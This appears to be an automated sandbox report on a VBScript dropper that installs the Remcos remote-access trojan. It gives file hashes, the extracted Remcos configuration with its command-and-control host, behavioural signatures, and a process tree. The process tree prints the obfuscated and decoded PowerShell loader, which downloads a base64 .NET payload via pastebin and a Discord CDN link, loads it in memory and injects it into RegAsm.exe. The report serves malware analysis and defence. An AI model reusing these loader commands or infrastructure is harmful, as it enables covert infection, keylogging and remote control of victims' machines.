Analysis
-
max time kernel
50s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240910-en -
resource tags
-
submitted
25-09-2024 14:43
General
-
Target
sostener.vbs
-
Size
1.6MB
-
MD5
76dc07a863d93237819c1e08c5bb0eef
-
SHA1
fc7e6a1ef7679f7461ae8b34987b46dc118cc4bb
-
SHA256
5e519ab2640c9d1065a0e7610661fcd83e2e38869d48768fcd1b674b3804dd0f
-
SHA512
9538b37d31fcb53e968ce7e69c13166e3f4f16fada79b9bac91ec2de012ed5b2642e6e380591c9716e9ae8d8f1149b7492e06c291bb8ec6a234af47daf95b51e
-
SSDEEP
192:9PmPPPPmPPPPPPGPmPPPPmPPPPPPGPmPPPPmPPPPPPGPmPPPPmPPPPPPGPmPPPP7:IeGsXcpR
Malware Config
Extracted
http://pastebin.com/raw/V9y5Q5vv
Extracted
remcos
RemoteHost
rem0324.duckdns.org:1213
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-WGH0X6
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 6 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GU☆egB0☆HM☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆YgB0☆G4☆aw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBy☆HY☆ZQBy☆EM☆ZQBy☆HQ☆aQBm☆Gk☆YwBh☆HQ☆ZQBW☆GE☆b☆Bp☆GQ☆YQB0☆Gk☆bwBu☆EM☆YQBs☆Gw☆YgBh☆GM☆aw☆g☆D0☆I☆B7☆CQ☆d☆By☆HU☆ZQB9☆Ds☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆HI☆dgBp☆GM☆ZQBQ☆G8☆aQBu☆HQ☆TQBh☆G4☆YQBn☆GU☆cgBd☆Do☆OgBT☆GU☆YwB1☆HI☆aQB0☆Hk☆U☆By☆G8☆d☆Bv☆GM☆bwBs☆C☆☆PQ☆g☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆V☆B5☆H☆☆ZQBd☆Do☆OgBU☆Gw☆cw☆x☆DI☆OwBb☆EI☆eQB0☆GU☆WwBd☆F0☆I☆☆k☆HU☆e☆B4☆Gc☆Yg☆g☆D0☆I☆Bb☆HM☆eQBz☆HQ☆ZQBt☆C4☆QwBv☆G4☆dgBl☆HI☆d☆Bd☆Do☆OgBG☆HI☆bwBt☆EI☆YQBz☆GU☆Ng☆0☆FM☆d☆By☆Gk☆bgBn☆Cg☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆Cc☆a☆B0☆HQ☆c☆☆6☆C8☆LwBw☆GE☆cwB0☆GU☆YgBp☆G4☆LgBj☆G8☆bQ☆v☆HI☆YQB3☆C8☆Vg☆5☆Hk☆NQBR☆DU☆dgB2☆Cc☆KQ☆g☆Ck☆I☆☆p☆Ds☆WwBz☆Hk☆cwB0☆GU☆bQ☆u☆EE☆c☆Bw☆EQ☆bwBt☆GE☆aQBu☆F0☆Og☆6☆EM☆dQBy☆HI☆ZQBu☆HQ☆R☆Bv☆G0☆YQBp☆G4☆LgBM☆G8☆YQBk☆Cg☆J☆B1☆Hg☆e☆Bn☆GI☆KQ☆u☆Ec☆ZQB0☆FQ☆eQBw☆GU☆K☆☆n☆FQ☆ZQBo☆HU☆b☆Bj☆Gg☆ZQBz☆Fg☆e☆BY☆Hg☆e☆☆u☆EM☆b☆Bh☆HM☆cw☆x☆Cc☆KQ☆u☆Ec☆ZQB0☆E0☆ZQB0☆Gg☆bwBk☆Cg☆JwBN☆HM☆cQBC☆Ek☆YgBZ☆Cc☆KQ☆u☆Ek☆bgB2☆G8☆awBl☆Cg☆J☆Bu☆HU☆b☆Bs☆Cw☆I☆Bb☆G8☆YgBq☆GU☆YwB0☆Fs☆XQBd☆C☆☆K☆☆n☆CY☆ZgBi☆Dc☆Mw☆w☆DU☆Mw☆w☆DU☆M☆☆x☆GE☆YQBi☆GI☆M☆☆2☆Dc☆OQ☆2☆Dc☆Yg☆2☆DY☆O☆☆z☆GI☆O☆☆w☆DQ☆N☆☆4☆GU☆Z☆☆1☆Dg☆Mg☆5☆GY☆N☆☆4☆GI☆MQBl☆DM☆Yw☆4☆GQ☆M☆Bl☆GY☆Mw☆2☆DY☆Mw☆y☆DE☆O☆☆0☆DE☆ZQ☆1☆GI☆Ng☆9☆G0☆a☆☆m☆Dc☆YgBk☆D☆☆N☆Bm☆DY☆Ng☆9☆HM☆aQ☆m☆Dc☆MwBm☆DU☆NQBm☆DY☆Ng☆9☆Hg☆ZQ☆/☆HQ☆e☆B0☆C4☆OQ☆w☆DU☆MgBz☆G8☆Uw☆v☆Dk☆NQ☆5☆DU☆M☆☆y☆DU☆OQ☆4☆DM☆O☆☆4☆Dk☆O☆☆0☆Dg☆O☆☆y☆DE☆Lw☆2☆DE☆O☆☆z☆D☆☆MQ☆5☆DE☆O☆☆4☆DI☆O☆☆0☆DY☆Mw☆1☆DE☆Mg☆x☆C8☆cwB0☆G4☆ZQBt☆Gg☆YwBh☆HQ☆d☆Bh☆C8☆bQBv☆GM☆LgBw☆H☆☆YQBk☆HI☆bwBj☆HM☆aQBk☆C4☆bgBk☆GM☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bv☆GI☆d☆Bu☆Gs☆I☆☆s☆C☆☆JwBf☆F8☆XwBf☆F8☆dQBq☆HM☆d☆Bn☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GU☆egB0☆HM☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jezts = '0';$obtnk = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $uxxgb = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($uxxgb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&fb730530501aabb067967b6683b80448ed5829f48b1e3c8d0ef366321841e5b6=mh&7bd04f66=si&73f55f66=xe?txt.9052soS/9595025983889848821/6183019188284635121/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $obtnk , '_____ujstg_______________________________________-------', $jezts, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\zezcohty.vbs"5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
544B
MD54196262905f64f1dd00381f882d1e2c4
SHA1325434edd2f6930f987de42e51228ca348745413
SHA2560b3cbde8778e4f47322ca017b5280f6eed3cd6f327b436eea4e91fbeb364a092
SHA512c3367ac15a473485aceafbe52aa591e33fb67dff21896b936173db78d2889f9ee200ce4b7d78ede67bc471433444dea1c4cb36013cda7f6f9f7df3416bb1aa73
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
40KB
-
Filesize
40KB